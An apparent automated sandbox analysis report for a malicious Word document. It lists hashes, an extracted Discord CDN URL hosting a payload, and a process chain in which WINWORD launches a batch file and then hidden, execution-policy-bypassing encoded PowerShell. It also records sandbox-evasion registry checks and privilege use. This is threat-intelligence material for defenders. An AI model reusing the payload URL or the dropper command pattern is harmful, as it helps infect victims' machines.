Analysis
- max time kernel: 122s
- max time network: 135s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 14-10-2021 18:35
Static task: static1
Behavioral task: behavioral1
  Sample: ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
  Resource: win10-en-20211014
General
- Target: ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
- Size: 31KB
- MD5: da6419e4d4e4528990898bcfdaa85e01
- SHA1: 8fdfe23dac4252203c5b7f9ff8b4778676188ca2
- SHA256: ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d
- SHA512: 2a0e6ce142058fc73fa968a705be71768b2a183610610f5715792b25a1f699df10e1eb745772deaa74322fa8f8237eb7be82d7d2657baccd602605cfcee818e0
Malware Config
Extracted URL: https://cdn.discordapp.com/attachments/851105085270523917/895674622702399538/Server.txt
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 1352 | 2272 | cmd.exe | WINWORD.EXE

Blocklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow | pid | process
  25 | 2104 | powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  2272 | WINWORD.EXE (2 occurrences)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe
  pid | process
  2104 | powershell.exe (3 occurrences)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2104 | powershell.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
Processes: WINWORD.EXE
  pid | process
  2272 | WINWORD.EXE (7 occurrences)

Suspicious use of WriteProcessMemory (4 IoCs)
Processes: WINWORD.EXE, cmd.exe
  description | pid | process | target process
  PID 2272 wrote to memory of 1352 | 2272 | WINWORD.EXE | cmd.exe (2 occurrences)
  PID 1352 wrote to memory of 2104 | 1352 | cmd.exe | powershell.exe (2 occurrences)
Processes

1. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc" /o ""
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\cmd.exe (child of WINWORD.EXE)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\zexo.bat" "
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of cmd.exe)
         Command line: poweRSheLL.eXe -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN -E 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"
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Public\Documents\zexo.bat
  MD5: a685d75068195fb660a916c72d1ffbcc
  SHA1: 7444ec315ba2439a0388415074667739323541c6
  SHA256: cc5a024786036aa094718ecc292f781bceed4cd6636885f4eec0ba285bd24570
  SHA512: ba66ecea4e5179be1b8670d3e14cf6cfafe6b98b7b0527c79398c3adc026bb82e38284392f712499cbf2cd6afe4325844a244662f129df3767a2cb7c88b62397